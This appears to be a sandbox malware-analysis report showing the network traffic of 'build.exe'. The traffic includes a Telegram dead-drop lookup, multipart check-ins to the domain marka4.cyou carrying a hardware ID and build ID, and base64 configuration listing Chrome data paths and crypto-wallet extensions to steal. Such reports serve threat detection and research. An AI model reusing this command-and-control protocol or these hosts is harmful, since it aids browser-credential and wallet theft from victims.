Jan 11, 2025 23:00:29.539021969 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:29.539031029 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.210040092 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.210061073 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.210099936 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.210119009 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.210130930 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.210133076 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.210171938 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.210493088 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.210504055 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.213335037 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.213413000 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.213614941 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.213922977 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.213953972 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.875853062 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.875977039 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.877204895 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.877234936 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:30.879214048 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:30.879228115 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:31.557037115 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:31.557117939 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:31.557116985 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:31.557182074 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:31.557379007 CET	49779	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:31.557434082 CET	443	49779	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:31.558728933 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:31.558770895 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:31.558844090 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:31.559057951 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:31.559073925 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.212837934 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.212913990 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.213480949 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.213509083 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.215296984 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.215308905 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.917951107 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.918006897 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.918051958 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.918051958 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.918118000 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.918150902 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.918206930 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.918277979 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.918318033 CET	443	49780	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.918371916 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.918371916 CET	49780	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.940634012 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.940726995 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:32.940814018 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.941031933 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:32.941066027 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:33.603357077 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:33.604598999 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:33.604878902 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:33.604906082 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:33.606332064 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:33.606345892 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:34.264615059 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:34.264712095 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:34.264780998 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:34.264781952 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:34.281250954 CET	49781	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:34.281316996 CET	443	49781	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:35.307645082 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:35.307734966 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:35.307812929 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:35.307889938 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:35.308759928 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:35.308784962 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.087475061 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.087574959 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.087668896 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.087902069 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.087937117 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.732186079 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.736128092 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.736603975 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.736630917 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.738162041 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.738173962 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.738240957 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.738260031 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.738272905 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.738291979 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.738423109 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.738461018 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.740407944 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.740446091 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.743572950 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.743594885 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:36.743649006 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:36.743665934 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.005425930 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.005496025 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.005660057 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.005660057 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.010168076 CET	49782	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.010214090 CET	443	49782	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.047795057 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.047878027 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.047966957 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.048254967 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.048290014 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.693249941 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.693327904 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.693831921 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.693856001 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:38.695589066 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:38.695600986 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:39.387305021 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:39.387423992 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:39.387434959 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:39.387520075 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:39.387634039 CET	49783	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:39.387670994 CET	443	49783	116.203.166.124	192.168.2.4
Jan 11, 2025 23:01:09.892163992 CET	49723	80	192.168.2.4	199.232.214.172
Jan 11, 2025 23:01:09.897258043 CET	80	49723	199.232.214.172	192.168.2.4
Jan 11, 2025 23:01:09.897317886 CET	49723	80	192.168.2.4	199.232.214.172

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 22:59:58.706823111 CET	50473	53	192.168.2.4	1.1.1.1
Jan 11, 2025 22:59:58.713577032 CET	53	50473	1.1.1.1	192.168.2.4
Jan 11, 2025 22:59:59.708213091 CET	63679	53	192.168.2.4	1.1.1.1
Jan 11, 2025 22:59:59.721477032 CET	53	63679	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:10.386909008 CET	53	54635	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:10.390341997 CET	53	57137	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:10.615933895 CET	54436	53	192.168.2.4	1.1.1.1
Jan 11, 2025 23:00:10.616445065 CET	63204	53	192.168.2.4	1.1.1.1
Jan 11, 2025 23:00:10.622628927 CET	53	54436	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:10.622962952 CET	53	63204	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:11.415566921 CET	53	62015	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:12.601851940 CET	53	62615	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:13.883115053 CET	60313	53	192.168.2.4	1.1.1.1
Jan 11, 2025 23:00:13.883232117 CET	55525	53	192.168.2.4	1.1.1.1
Jan 11, 2025 23:00:13.887830019 CET	53	58855	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:13.889645100 CET	53	60313	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:13.890141010 CET	53	55525	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:14.888565063 CET	63931	53	192.168.2.4	1.1.1.1
Jan 11, 2025 23:00:14.888828039 CET	64863	53	192.168.2.4	1.1.1.1
Jan 11, 2025 23:00:14.895283937 CET	53	63931	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:14.895426989 CET	53	64863	1.1.1.1	192.168.2.4
Jan 11, 2025 23:00:21.476488113 CET	138	138	192.168.2.4	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 22:59:58.706823111 CET	192.168.2.4	1.1.1.1	0xffc0	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jan 11, 2025 22:59:59.708213091 CET	192.168.2.4	1.1.1.1	0xd42	Standard query (0)	marka4.cyou	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:10.615933895 CET	192.168.2.4	1.1.1.1	0xbcbf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:10.616445065 CET	192.168.2.4	1.1.1.1	0xa717	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 11, 2025 23:00:13.883115053 CET	192.168.2.4	1.1.1.1	0xe862	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:13.883232117 CET	192.168.2.4	1.1.1.1	0x6035	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jan 11, 2025 23:00:14.888565063 CET	192.168.2.4	1.1.1.1	0x6303	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:14.888828039 CET	192.168.2.4	1.1.1.1	0xf13b	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 22:59:58.713577032 CET	1.1.1.1	192.168.2.4	0xffc0	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Jan 11, 2025 22:59:59.721477032 CET	1.1.1.1	192.168.2.4	0xd42	No error (0)	marka4.cyou		116.203.166.124	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:10.622628927 CET	1.1.1.1	192.168.2.4	0xbcbf	No error (0)	www.google.com		142.250.184.196	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:10.622962952 CET	1.1.1.1	192.168.2.4	0xa717	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 11, 2025 23:00:13.889645100 CET	1.1.1.1	192.168.2.4	0xe862	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 23:00:13.889645100 CET	1.1.1.1	192.168.2.4	0xe862	No error (0)	plus.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jan 11, 2025 23:00:13.890141010 CET	1.1.1.1	192.168.2.4	0x6035	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 23:00:14.895283937 CET	1.1.1.1	192.168.2.4	0x6303	No error (0)	play.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

marka4.cyou

www.google.com

apis.google.com

play.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	149.154.167.99	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 21:59:59 UTC	85	OUT	GET /no111p HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 21:59:59 UTC	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 21:59:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12298 Connection: close Set-Cookie: stel_ssid=3a0cf3658b30a0b4a5_234646279905062565; expires=Sun, 12 Jan 2025 21:59:59 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-01-11 21:59:59 UTC	12298	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6e 6f 31 31 31 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @no111p</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:00 UTC	184	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:01 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----aim7glfcbie3eus00hlx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:01 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 61 69 6d 37 67 6c 66 63 62 69 65 33 65 75 73 30 30 68 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 41 38 39 43 42 35 38 35 37 36 32 37 37 38 39 30 34 39 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 61 69 6d 37 67 6c 66 63 62 69 65 33 65 75 73 30 30 68 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 61 69 6d 37 67 6c 66 63 62 69 65 33 65 75 73 30 30 68 6c 78 2d 2d 0d Data Ascii: ------aim7glfcbie3eus00hlxContent-Disposition: form-data; name="hwid"C3A89CB585762778904926-a33c7340-61ca------aim7glfcbie3eus00hlxContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------aim7glfcbie3eus00hlx--
2025-01-11 22:00:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:02 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|7b9d3d0b4d64edf82e69cdc158b461de\|1\|1\|1\|1\|1\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:03 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----y58gl689hvkn7y5f3ohl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 79 35 38 67 6c 36 38 39 68 76 6b 6e 37 79 35 66 33 6f 68 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 79 35 38 67 6c 36 38 39 68 76 6b 6e 37 79 35 66 33 6f 68 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 79 35 38 67 6c 36 38 39 68 76 6b 6e 37 79 35 66 33 6f 68 6c 0d 0a 43 6f 6e 74 Data Ascii: ------y58gl689hvkn7y5f3ohlContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------y58gl689hvkn7y5f3ohlContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------y58gl689hvkn7y5f3ohlCont
2025-01-11 22:00:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:03 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:04 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----9r1vsjecjec2vaim79hv User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:04 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 72 31 76 73 6a 65 63 6a 65 63 32 76 61 69 6d 37 39 68 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 39 72 31 76 73 6a 65 63 6a 65 63 32 76 61 69 6d 37 39 68 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 39 72 31 76 73 6a 65 63 6a 65 63 32 76 61 69 6d 37 39 68 76 0d 0a 43 6f 6e 74 Data Ascii: ------9r1vsjecjec2vaim79hvContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------9r1vsjecjec2vaim79hvContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------9r1vsjecjec2vaim79hvCont
2025-01-11 22:00:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:05 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
